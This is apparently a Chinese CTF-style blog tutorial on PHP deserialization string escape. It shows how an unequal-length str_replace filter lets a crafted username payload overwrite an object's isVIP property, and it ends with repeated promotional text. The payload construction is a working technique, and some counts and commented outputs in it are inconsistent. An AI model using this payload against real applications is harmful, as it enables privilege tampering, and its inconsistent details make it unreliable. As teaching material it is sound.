php反序列化逃逸
逃逸是php中反序列化时的恶意利用,以ctf为例演示
第一段演示
逃逸为ctf反序列化的内容,主要是对序列化对象进行过滤,其中替换串长度不一致,造成字符逃逸。攻击者可以构造恶意的payload,改变对象中的属性,达到恶意利用
<?php
class user{
public $username;
public $password;
public $isVIP;
public function \_\_construct($u,$p)
{
$this->username = $u;
$this->password = $p;
$this->isVIP = 0;
}
}
function filter($s)
{
return str\_replace("admin","hacker",$s);
}
$u = new user("admin",'123456');
$u\_ser = serialize($u);
//O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
echo PHP\_EOL;
$us = filter($u\_ser);
//O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
//过滤前,过滤后
//O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
//O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
$u = new user('admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}',"123456");
//O:4:"user":3:{s:8:"username";s:52:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
//";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} is length of 47
$u = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}',"123456");
$u\_ser = serialize($u);
$filterted = filter($u\_ser);
//O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
//forget of modify value of vip, it should be (int)1
$obj = unserialize($filterted);
var\_dump($obj);
最终的目的是修改对象的isVIP属性为1,通过反序列化
对象u进行序列化,很正常
us对u的内容作替换,将admin替换为hacker,长度不一样,有逃逸风险
比如
s:5:"hacker";就是这个属性看5位,将它反序列化,内容就变成了hacke,r就逃逸了
原因是它本来是admin是5位,通过过滤直接替换,造成纰漏
尝试构造payload
$u = new user('admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}',"123456");
其中";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}是截取出来的
尝试逃逸
$u = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}',"123456");这么多重复的admin都将被替换为hacker。admin有282个字符,全部替换为hacker后就有了逃逸的条件。让原来的序列化内容容纳下";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;},而长度还是282,就是读到";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}就结束,在反序列化时形成一个完整的对象
这样一来就可在var_dump看到isVIP属性确实遭到更改var_dump($obj);
第二段说明
<?php
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function \_\_construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
$obj = new message('fuck','b','c');
function filter($obj){
return str\_replace('fuck', 'loveU', $obj);
}
$objSer = serialize($obj);
echo $objSer;
//O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
echo PHP\_EOL;
$objSerFil = filter($objSer);
echo $objSerFil;
//O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}
//could flee
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
1206
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
